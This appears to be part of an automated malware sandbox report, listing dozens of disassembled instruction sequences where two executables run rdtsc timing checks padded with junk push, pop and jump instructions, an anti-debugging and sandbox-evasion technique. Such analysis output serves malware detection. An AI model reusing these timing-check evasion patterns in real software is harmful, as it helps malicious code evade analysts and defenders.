                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5CE64 second address: E5CEBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91E8D5401Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F91E8D54021h 0x00000013 push ebx 0x00000014 jmp 00007F91E8D54025h 0x00000019 jmp 00007F91E8D54025h 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jne 00007F91E8D54016h 0x00000027 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E60C83 second address: E60C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jl 00007F91E851B8D6h 0x00000011 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E60C94 second address: E60C9E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91E8D54016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E60FE8 second address: E61003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8DEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F91E851B8D6h 0x00000012 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61003 second address: E61007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61007 second address: E61017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F91E851B8D6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61017 second address: E61037 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F91E8D54027h 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61152 second address: E61156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61156 second address: E6115C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6115C second address: E61162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61162 second address: E6116C instructions: 0x00000000 rdtsc 0x00000002 js 00007F91E8D54016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E612B7 second address: E612BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6140F second address: E61447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F91E8D54020h 0x0000000d popad 0x0000000e jmp 00007F91E8D5401Bh 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F91E8D5401Fh 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61447 second address: E6144F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61594 second address: E615AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54023h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E615AC second address: E615B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E61712 second address: E61718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6FC13 second address: E6FC17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6E288 second address: E6E2A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54025h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6E702 second address: E6E709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6E709 second address: E6E749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F91E8D5402Ah 0x00000011 jp 00007F91E8D54018h 0x00000017 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6E749 second address: E6E77E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91E851B8E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F91E851B8E9h 0x0000000f jg 00007F91E851B8D6h 0x00000015 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6E91E second address: E6E93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91E8D54027h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6E93A second address: E6E949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6E949 second address: E6E96C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F91E8D54020h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F91E8D5401Dh 0x00000010 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6EAE2 second address: E6EAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6EC49 second address: E6EC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6FA46 second address: E6FA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8E1h 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6FA5B second address: E6FA75 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007F91E8D54016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F91E8D54016h 0x00000014 jl 00007F91E8D54016h 0x0000001a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6FA75 second address: E6FA7F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6FA7F second address: E6FA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6FA85 second address: E6FA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6FA89 second address: E6FA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E6FA8D second address: E6FA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E751D3 second address: E751F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F91E8D54016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F91E8D5401Bh 0x00000017 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E751F0 second address: E751F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E85B0D second address: E85B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E85B11 second address: E85B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F91E851B8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E85B1C second address: E85B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E85B22 second address: E85B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E85B2B second address: E85B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E8D54028h 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E85B47 second address: E85B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F91E851B8DBh 0x00000010 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E8B30B second address: E8B317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F91E8D54016h 0x0000000c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E97474 second address: E974A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F91E851B8DCh 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F91E851B8E2h 0x00000015 pop eax 0x00000016 push ebx 0x00000017 jnp 00007F91E851B8D6h 0x0000001d pop ebx 0x0000001e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E974A6 second address: E974C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54028h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E974C4 second address: E974E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C222 second address: E9C226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C226 second address: E9C22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C22C second address: E9C24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F91E8D54025h 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C536 second address: E9C53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C53A second address: E9C551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Dh 0x00000007 jnl 00007F91E8D54016h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C551 second address: E9C577 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F91E851B8DEh 0x00000008 jo 00007F91E851B8DCh 0x0000000e jno 00007F91E851B8D6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C577 second address: E9C57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C57B second address: E9C585 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C585 second address: E9C58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C6C2 second address: E9C6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C6C9 second address: E9C6D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9C6D1 second address: E9C6D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9CB04 second address: E9CB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9CB08 second address: E9CB23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E9CC81 second address: E9CCA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F91E8D54024h 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EA1120 second address: EA1127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EA1296 second address: EA12BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d js 00007F91E8D54016h 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jnc 00007F91E8D54016h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EA52EC second address: EA52FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F91E851B8D6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EA52FA second address: EA5300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EA5300 second address: EA5325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F91E851B8D6h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F91E851B8DFh 0x00000013 jng 00007F91E851B8D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EAEE28 second address: EAEE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EAEE2C second address: EAEE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EAEE35 second address: EAEE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F91E8D54029h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3DCAD second address: F3DCC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3DCC2 second address: F3DCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3DCC9 second address: F3DCD9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007F91E851B8D6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3DCD9 second address: F3DCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F91E8D54016h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3CE49 second address: F3CE4F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3D3D3 second address: F3D3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F91E8D54016h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3D3DD second address: F3D3ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007F91E851B8D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3D3ED second address: F3D3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91E8D54016h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3D581 second address: F3D59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8E7h 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FACC second address: F3FAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F91E8D54018h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FAE2 second address: F3FAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FAE6 second address: F3FAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FAEC second address: F3FB19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jo 00007F91E851B8E3h 0x00000014 jmp 00007F91E851B8DDh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FB19 second address: F3FB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FB1D second address: F3FB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FB90 second address: F3FB94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FB94 second address: F3FC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 2C4B58B7h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F91E851B8D8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jmp 00007F91E851B8DCh 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 jmp 00007F91E851B8E9h 0x00000036 push 00000003h 0x00000038 mov edx, dword ptr [ebp+13712A6Dh] 0x0000003e push 954AD751h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F91E851B8E5h 0x0000004a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FC0B second address: F3FC11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FD10 second address: F3FD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FDD0 second address: F3FDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FED6 second address: F3FEEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F91E851B8D6h 0x00000015 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FEEB second address: F3FEF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FEF1 second address: F3FEF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F3FEF7 second address: F3FEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
